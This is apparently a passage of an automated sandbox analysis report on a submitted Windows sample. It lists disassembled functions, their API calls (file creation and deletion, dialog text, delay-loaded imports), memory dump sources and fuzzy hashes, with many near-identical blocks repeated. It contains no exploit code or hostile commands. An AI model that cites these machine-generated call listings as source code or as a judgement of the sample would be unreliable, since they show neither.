                                                                    • Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
                                                                    • Opcode Fuzzy Hash: 1c65f8afd80d3f16fffa2beaf08abf47ec92fd552133e9eaa2b7d5e209c2c152
                                                                    • Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: d997fcce715e91b2754fa75bcbdd914a9614b064a6bafb1d7b525ab5ec05cd42
                                                                    • Instruction ID: 13bbd57bc29ca08ed6e9e921e471f00d2601ef7fb6769a17201821c06c5bc4ca
                                                                    • Opcode Fuzzy Hash: d997fcce715e91b2754fa75bcbdd914a9614b064a6bafb1d7b525ab5ec05cd42
                                                                    • Instruction Fuzzy Hash: 01A001AA2A9212FC310973A5AD06DFB6A1DD4C0B2573099AEF44AD5486A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: f21c474ecd3cf86129f356ee2352fd4fff90d908a23ecdb9c916a16009909c79
                                                                    • Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
                                                                    • Opcode Fuzzy Hash: f21c474ecd3cf86129f356ee2352fd4fff90d908a23ecdb9c916a16009909c79
                                                                    • Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB08A7
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 12b6e5d188ae32be9156f6a3a44677bf735fc79a23e9780ec7a9f7cbf0977e95
                                                                    • Instruction ID: 42711266184ea69d1679bf6f2836ec445c213aa791d286f88567ed1cb4a29287
                                                                    • Opcode Fuzzy Hash: 12b6e5d188ae32be9156f6a3a44677bf735fc79a23e9780ec7a9f7cbf0977e95
                                                                    • Instruction Fuzzy Hash: 9AA001AA2A9112FC31097395AD06DFB5A1DD4C4B65730996EF44BC5482A880698950B1
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 63bb808164e5983d486f494eddd634a9007d7b510583fa9545a44e81dcf9d457
                                                                    • Instruction ID: 38815c32575596b0a379d943f8f3c487d85880dbfc06f971c0b4b7f63979260b
                                                                    • Opcode Fuzzy Hash: 63bb808164e5983d486f494eddd634a9007d7b510583fa9545a44e81dcf9d457
                                                                    • Instruction Fuzzy Hash: 3FA001D62E9202FC3209A3A5AD2AEFB1A9EE4C0B25730996EF586D5481A9816C4A5031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 395b543e85e13b46dac9088c691c48d45cd8c1dbd8f768e40f1b322280eda8af
                                                                    • Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
                                                                    • Opcode Fuzzy Hash: 395b543e85e13b46dac9088c691c48d45cd8c1dbd8f768e40f1b322280eda8af
                                                                    • Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: fa2c74629f91321e5d9df6dcc8cf94e4311f09105b34a1ffa3854b7c36f369f4
                                                                    • Instruction ID: f3d91c39fb9e2d2cfc01da3afdcece477c6827d24a6f1389d089030e9317ba03
                                                                    • Opcode Fuzzy Hash: fa2c74629f91321e5d9df6dcc8cf94e4311f09105b34a1ffa3854b7c36f369f4
                                                                    • Instruction Fuzzy Hash: 9AA001D62E9202FC320963A5AD26DFB1A5EE4C4B657309D6EF487C5481A9816C4A5031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB0A5D
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: bfdabd67726db5bed5ee28db95863104a5db8a188c353e2b97a8b8a00824e158
                                                                    • Instruction ID: f3d91c39fb9e2d2cfc01da3afdcece477c6827d24a6f1389d089030e9317ba03
                                                                    • Opcode Fuzzy Hash: bfdabd67726db5bed5ee28db95863104a5db8a188c353e2b97a8b8a00824e158
                                                                    • Instruction Fuzzy Hash: 9AA001D62E9202FC320963A5AD26DFB1A5EE4C4B657309D6EF487C5481A9816C4A5031
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 57bc0bfe038a917e5d8eb89ac13ab49abc06264b6cbfa1c89b0c08ac07f02b73
                                                                    • Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
                                                                    • Opcode Fuzzy Hash: 57bc0bfe038a917e5d8eb89ac13ab49abc06264b6cbfa1c89b0c08ac07f02b73
                                                                    • Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: c89fc5990e518fc09c2e41d0a4e0c79557485f813cd5e6dfd7b082f31cffc981
                                                                    • Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
                                                                    • Opcode Fuzzy Hash: c89fc5990e518fc09c2e41d0a4e0c79557485f813cd5e6dfd7b082f31cffc981
                                                                    • Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00DB09FC
                                                                      • Part of subcall function 00DB0D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DB0DAD
                                                                      • Part of subcall function 00DB0D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DB0DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                    • String ID:
                                                                    • API String ID: 1269201914-0
                                                                    • Opcode ID: 0c022d574d6e64ec4424698b16ade5715ee85ce25ca7a7161a5a77c2e39f6eae
                                                                    • Instruction ID: 9d1acb80ff63d2e6c16b381d4867935985460d1cfbd80f0636788988b7926469
                                                                    • Opcode Fuzzy Hash: 0c022d574d6e64ec4424698b16ade5715ee85ce25ca7a7161a5a77c2e39f6eae
                                                                    • Instruction Fuzzy Hash: CEA011C23A8002FC38082380AC02CFB0A0EC0C8B20330CA2EF003C0082A8803C080030
                                                                    APIs
                                                                    • SetEndOfFile.KERNELBASE(?,00D9A712,?,?,?,?,?,?,?), ref: 00D9B94C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File
                                                                    • String ID:
                                                                    • API String ID: 749574446-0
                                                                    • Opcode ID: 996e043dafc6b846139073ebb3450ee35f67f2c53b722a193e77ca6e1bf5659b
                                                                    • Instruction ID: 5135082f76b834f2776307c0917860b9cb418422d4683e7a5a09775414a024e2
                                                                    • Opcode Fuzzy Hash: 996e043dafc6b846139073ebb3450ee35f67f2c53b722a193e77ca6e1bf5659b
                                                                    • Instruction Fuzzy Hash: 7AA0223008000F8BCE002B30CE0880C3B20FB20BC030002E8A00BCF0B2CB23C80BEB20
                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 00DACBBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID:
                                                                    • API String ID: 1611563598-0
                                                                    • Opcode ID: 4c0552ffd08518e0b8807e77aa6af7daa056751463893f5c076374679fb68603
                                                                    • Instruction ID: 6d08b6c545f7d82c8179db204df472c3badad0f4dfac18d9dae3ac02bb06dc85
                                                                    • Opcode Fuzzy Hash: 4c0552ffd08518e0b8807e77aa6af7daa056751463893f5c076374679fb68603
                                                                    • Instruction Fuzzy Hash: 54A012301003028782000B318F0590E76556F51A01F04C0346001C0130C731C820A510
                                                                    APIs
                                                                      • Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                      • Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DAE602
                                                                    • EndDialog.USER32(?,00000006), ref: 00DAE615
                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00DAE631
                                                                    • SetFocus.USER32(00000000), ref: 00DAE638
                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00DAE66C
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DAE69F
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00DAE6B5
                                                                      • Part of subcall function 00DACBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACBEE
                                                                      • Part of subcall function 00DACBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DACC05
                                                                      • Part of subcall function 00DACBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DACC19
                                                                      • Part of subcall function 00DACBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACC2A
                                                                      • Part of subcall function 00DACBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DACC42
                                                                      • Part of subcall function 00DACBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00DACC66
                                                                      • Part of subcall function 00DACBC8: _swprintf.LIBCMT ref: 00DACC85
                                                                    • _swprintf.LIBCMT ref: 00DAE704
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DAE717
                                                                    • FindClose.KERNEL32(00000000), ref: 00DAE71E
                                                                    • _swprintf.LIBCMT ref: 00DAE773
                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00DAE786
                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DAE7A0
                                                                    • _swprintf.LIBCMT ref: 00DAE7D9
                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DAE7EC
                                                                    • _swprintf.LIBCMT ref: 00DAE83C
                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00DAE84F
                                                                      • Part of subcall function 00DAD0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DAD0E1
                                                                      • Part of subcall function 00DAD0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,00DD272C,?,?), ref: 00DAD12A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                    • String ID: %s %s$REPLACEFILEDLG
                                                                    • API String ID: 3464475507-439456425
                                                                    • Opcode ID: cf21ebda49af94f2b7952c89803c524082824d324d87ac03ac95ab70ae77028c
                                                                    • Instruction ID: 7ca783a23ff0ad9393004935299868f66e2cfb0da1431045ad1b1bf22b51f0ef
                                                                    • Opcode Fuzzy Hash: cf21ebda49af94f2b7952c89803c524082824d324d87ac03ac95ab70ae77028c
                                                                    • Instruction Fuzzy Hash: 1E719372649344BBE331AB64EC49FFF77ADEB8A700F040819F649D6181DA759904CB72
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D9807F
                                                                    • _wcslen.LIBCMT ref: 00D98112
                                                                      • Part of subcall function 00D98C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D98CB2
                                                                      • Part of subcall function 00D98C95: GetLastError.KERNEL32 ref: 00D98CF6
                                                                      • Part of subcall function 00D98C95: CloseHandle.KERNEL32(?), ref: 00D98D05
                                                                      • Part of subcall function 00D9BC65: DeleteFileW.KERNELBASE(?,?,?,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9BC82
                                                                      • Part of subcall function 00D9BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,00D9B14B,?,00000000,00D9AF6E,E7604376,00000000,00DC517A,000000FF,?,00D98882,?), ref: 00D9BCAE
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D981C1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00D981DD
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,E7604376,00000000), ref: 00D98329
                                                                      • Part of subcall function 00D9B7E2: FlushFileBuffers.KERNEL32(?), ref: 00D9B7FC
                                                                      • Part of subcall function 00D9B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D9B8B0
                                                                      • Part of subcall function 00D9AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,00D9AF75,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9AFEB
                                                                      • Part of subcall function 00D9C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00D9BF5E,?,?), ref: 00D9C305
